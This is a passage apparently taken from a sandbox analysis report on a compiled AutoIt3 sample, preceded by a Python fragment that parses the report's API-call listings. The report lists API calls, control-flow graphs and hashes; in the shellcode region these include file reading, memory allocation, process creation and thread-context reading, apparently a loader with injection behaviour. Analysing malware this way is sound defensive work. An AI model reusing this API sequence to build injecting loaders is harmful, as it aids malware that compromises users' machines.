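SAMPLE_STRING_ID = "/AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW"

# AutoIt3 interpreter markers taken from this sample's own strings (assumed list,
# chosen by the editor): the GUI window class name and the interpreter switches.
AUTOIT_MARKERS = (
    "AutoIt v3 GUI", "AutoIt v3",
    "/AutoIt3ExecuteScript", "/AutoIt3ExecuteLine", "/AutoIt3OutputDebug", "/ErrorStdOut",
)

Arg = Union[int, str, None]

@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: int                       # address of the call site as printed after "ref:"
    subcall: Optional[int] = None  # set when the line was "Part of subcall function X"

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8_RE = re.compile(r"[0-9A-Fa-f]{8}")

def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None          # the sandbox prints '?' for a value it could not resolve
    if HEX8_RE.fullmatch(tok):
        return int(tok, 16)  # 8-digit hex as printed; an 8-char hex-looking literal would also land here
    return tok               # a resolved string literal, e.g. TaskbarCreated

def parse_api_lines(text: str) -> list:
    """Parse 'Function.MODULE(args), ref: addr' lines; lines of any other shape are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw else [_parse_arg(t) for t in raw.split(",")]
        calls.append(ApiCall(
            func=m.group("func"), module=m.group("module"), args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls

def parse_string_id(field: str) -> list:
    """Split a String ID field into its strings; '$' is the separator inferred from the listings."""
    return [s for s in field.split("$") if s]

def autoit_indicators(strings: list) -> list:
    """Return the AutoIt3 markers present in a function's string list, in listing order."""
    return [s for s in strings if s in AUTOIT_MARKERS]

def calls_by_module(calls: list) -> dict:
    """Group call sites by module, e.g. to see which USER32/COMCTL32 APIs one function touches."""
    out = {}
    for c in calls:
        out.setdefault(c.module, []).append(c.func)
    return out

if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_APIS):
        where = f" (via subcall {c.subcall:08X})" if c.subcall is not None else ""
        print(f"{c.ref:08X}: {c.module}!{c.func}{tuple(c.args)}{where}")
    print("AutoIt3 markers:", autoit_indicators(parse_string_id(SAMPLE_STRING_ID)))
```

Running the block over the embedded lines yields one record per call site, with `RegisterWindowMessageW(TaskbarCreated)` attributed to the subcall at 00410490 and the four interpreter switches reported from the String ID field; pointing it at a saved copy of the full report gives the same records for every function block.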
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc7fee0ee8d79b611645c3cf16b22df94302afaeb9d6cf75eaf0d48d8dfc2926
• Instruction ID: 1555620249d9bca8109bc9dac4b4fb45b2a7888f9a4ed29ad5b0dea482c9f251
• Opcode Fuzzy Hash: dc7fee0ee8d79b611645c3cf16b22df94302afaeb9d6cf75eaf0d48d8dfc2926
• Instruction Fuzzy Hash: 1412D5B0E043859FDB259F68C8847FE7BF0AF06304F14459AE4528B292D37C99C2CB5A

Control-flow Graph (rendered graph not reproduced; the line below is the graph's basic-block and edge list: each numbered node is an address range with the API calls and callees annotated on it, and `a->b` entries are edges)

control_flow_graph 2237 401100-401111 2238 401113-401119 2237->2238 2239 401179-401180 2237->2239 2240 401144-40114a 2238->2240 2241 40111b-40111e 2238->2241 2239->2238 2242 401182 2239->2242 2244 401184-40118e call 401250 2240->2244 2245 40114c-40114f 2240->2245 2241->2240 2243 401120-401126 2241->2243 2246 40112c-401141 DefWindowProcW 2242->2246 2243->2246 2247 42b038-42b03f 2243->2247 2256 401193-40119a 2244->2256 2248 401151-401157 2245->2248 2249 40119d 2245->2249 2247->2246 2255 42b045-42b059 call 401000 call 40e0c0 2247->2255 2253 401219-40121f 2248->2253 2254 40115d 2248->2254 2251 4011a3-4011a9 2249->2251 2252 42afb4-42afc5 call 40f190 2249->2252 2251->2243 2257 4011af 2251->2257 2252->2256 2253->2243 2260 401225-42b06d call 468b0e 2253->2260 2258 401163-401166 2254->2258 2259 42b01d-42b024 2254->2259 2255->2246 2257->2243 2263 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2257->2263 2264 4011db-401202 SetTimer RegisterWindowMessageW 2257->2264 2266 42afe9-42b018 call 40f190 call 401a50 2258->2266 2267 40116c-401172 2258->2267 2259->2246 2265 42b02a-42b033 call 4370f4 2259->2265 2260->2256 2264->2256 2274 401204-401216 CreatePopupMenu 2264->2274 2265->2246 2266->2246 2267->2243 2276 401174-42afde call 45fd57 2267->2276 2276->2246 2288 42afe4 2276->2288 2288->2256
APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
• KillTimer.USER32(?,00000001,?), ref: 004011B9
• PostQuitMessage.USER32(00000000), ref: 004011CB
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
• CreatePopupMenu.USER32 ref: 00401204
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
• Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                                  • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

Control-flow Graph
control_flow_graph 2289 44025f8-44026a6 call 4400048 2292 44026ad-44026d3 call 4403508 CreateFileW 2289->2292 2295 44026d5 2292->2295 2296 44026da-44026ea 2292->2296 2297 4402825-4402829 2295->2297 2303 44026f1-440270b VirtualAlloc 2296->2303 2304 44026ec 2296->2304 2298 440286b-440286e 2297->2298 2299 440282b-440282f 2297->2299 2305 4402871-4402878 2298->2305 2301 4402831-4402834 2299->2301 2302 440283b-440283f 2299->2302 2301->2302 2306 4402841-440284b 2302->2306 2307 440284f-4402853 2302->2307 2308 4402712-4402729 ReadFile 2303->2308 2309 440270d 2303->2309 2304->2297 2310 440287a-4402885 2305->2310 2311 44028cd-44028e2 2305->2311 2306->2307 2314 4402863 2307->2314 2315 4402855-440285f 2307->2315 2316 4402730-4402770 VirtualAlloc 2308->2316 2317 440272b 2308->2317 2309->2297 2318 4402887 2310->2318 2319 4402889-4402895 2310->2319 2312 44028f2-44028fa 2311->2312 2313 44028e4-44028ef VirtualFree 2311->2313 2313->2312 2314->2298 2315->2314 2322 4402772 2316->2322 2323 4402777-4402792 call 4403758 2316->2323 2317->2297 2318->2311 2320 4402897-44028a7 2319->2320 2321 44028a9-44028b5 2319->2321 2324 44028cb 2320->2324 2325 44028c2-44028c8 2321->2325 2326 44028b7-44028c0 2321->2326 2322->2297 2329 440279d-44027a7 2323->2329 2324->2305 2325->2324 2326->2324 2330 44027a9-44027d8 call 4403758 2329->2330 2331 44027da-44027ee call 4403568 2329->2331 2330->2329 2337 44027f0 2331->2337 2338 44027f2-44027f6 2331->2338 2337->2297 2339 4402802-4402806 2338->2339 2340 44027f8-44027fc CloseHandle 2338->2340 2341 4402816-440281f 2339->2341 2342 4402808-4402813 VirtualFree 2339->2342 2340->2339 2341->2292 2341->2297 2342->2341
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 044026C9
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 044028EF
Memory Dump Source
• Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
• Instruction ID: 64d2f91ecfa9242be2480a4d54404bf3ef4c32dd7e4162b96ae4269cf5147ffe
• Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
• Instruction Fuzzy Hash: EAA10B75E00209EBDF24CFA4C898BAEB7B5BF48304F1085A9E501BB2C0D7B5AE55DB50

Control-flow Graph
control_flow_graph 2343 401250-40125c 2344 401262-401293 call 412f40 call 401b80 2343->2344 2345 4012e8-4012ed 2343->2345 2350 4012d1-4012e2 KillTimer SetTimer 2344->2350 2351 401295-4012b5 2344->2351 2350->2345 2352 4012bb-4012bf 2351->2352 2353 4272ec-4272f2 2351->2353 2354 4012c5-4012cb 2352->2354 2355 42733f-427346 2352->2355 2356 4272f4-427315 Shell_NotifyIconW 2353->2356 2357 42731a-42733a Shell_NotifyIconW 2353->2357 2354->2350 2358 427393-4273b4 Shell_NotifyIconW 2354->2358 2359 427348-427369 Shell_NotifyIconW 2355->2359 2360 42736e-42738e Shell_NotifyIconW 2355->2360 2356->2350 2357->2350 2358->2350 2359->2350 2360->2350
APIs
  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
• KillTimer.USER32(?,?,?,?,?), ref: 004012D3
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: IconNotifyShell_$Timer$Kill
• String ID:
• API String ID: 3970887597-0
• Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
• Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
• Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
• Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

Control-flow Graph
control_flow_graph 2361 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2364 427190-4271ae RegQueryValueExW 2361->2364 2365 40e4eb-40e4f0 2361->2365 2366 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2364->2366 2367 42721a-42722a RegCloseKey 2364->2367 2372 427210-427219 call 436508 2366->2372 2373 4271f7-42720e call 402160 2366->2373 2372->2367 2373->2372
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
• RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: 906690bb38058ea6333b0ba06a20dd5c88953ad756bc424b533cc5dd20346e93
• Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
• Opcode Fuzzy Hash: 906690bb38058ea6333b0ba06a20dd5c88953ad756bc424b533cc5dd20346e93
• Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

Control-flow Graph
control_flow_graph 2378 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
• ShowWindow.USER32(?,00000000), ref: 004105E4
• ShowWindow.USER32(?,00000000), ref: 004105EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
• Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

Control-flow Graph
control_flow_graph 2379 44023f8-44024f0 call 4400048 call 44022e8 CreateFileW 2386 44024f2 2379->2386 2387 44024f7-4402507 2379->2387 2388 44025a7-44025ac 2386->2388 2390 4402509 2387->2390 2391 440250e-4402528 VirtualAlloc 2387->2391 2390->2388 2392 440252a 2391->2392 2393 440252c-4402543 ReadFile 2391->2393 2392->2388 2394 4402545 2393->2394 2395 4402547-4402581 call 4402328 call 44012e8 2393->2395 2394->2388 2400 4402583-4402598 call 4402378 2395->2400 2401 440259d-44025a5 ExitProcess 2395->2401 2400->2401 2401->2388
APIs
  • Part of subcall function 044022E8: Sleep.KERNELBASE(000001F4), ref: 044022F9
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 044024E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: 1MS8UU027Q
• API String ID: 2694422964-4233931718
• Opcode ID: 2151b27858c7c5cc53c6fa494e1f73d8dc552efb7ece163b404d18962edf94eb
• Instruction ID: e08f82bc87250bbaf2062abc5ed9cc3c3e8e1d34e1414d34d7545dd17068263e
• Opcode Fuzzy Hash: 2151b27858c7c5cc53c6fa494e1f73d8dc552efb7ece163b404d18962edf94eb
• Instruction Fuzzy Hash: 0B515331D04219EBEF11DBA4C819BEFB778AF49300F0085A9E619B72C0DBB55B45CBA5

Control-flow Graph
APIs
• RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
• RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
• RegCloseKey.KERNELBASE(?), ref: 0040F2B5
• RegCloseKey.ADVAPI32(?), ref: 0040F2C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Close$OpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 1607946009-824357125
• Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
• Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4

Control-flow Graph
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 04401AA3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04401B39
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04401B5B
Memory Dump Source
• Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 86d3f5362505df67a9802f6ff4ae5504519ef5f7159c53e5db4ac50a1c40347f
• Instruction ID: a9ae909b724ec971fa2768380a0342a3829e2ee2b6e794d4d3f120ddfbf8fcf0
• Opcode Fuzzy Hash: 86d3f5362505df67a9802f6ff4ae5504519ef5f7159c53e5db4ac50a1c40347f
• Instruction Fuzzy Hash: 3B62EB30A146589BEB24DFA4C850BDEB376EF58300F1091A9D10DEB3D0E776AE91CB59

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FileModuleNameOpen
• String ID: Include$\
• API String ID: 1506145535-3429789819
• Opcode ID: 37ca38a5db4ef05eb1e0e5fabb9f05a74c8a0da3bb851e953f3a10516ddaaf28
• Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
• Opcode Fuzzy Hash: 37ca38a5db4ef05eb1e0e5fabb9f05a74c8a0da3bb851e953f3a10516ddaaf28
• Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
APIs
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: IconLoadNotifyShell_String
• String ID: Line:
• API String ID: 3363329723-1585850449
• Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
• Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 0042961B
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen
• String ID: X$pWH
• API String ID: 819131735-941433119
• Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
• Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
• Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
• Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                  • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                  • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
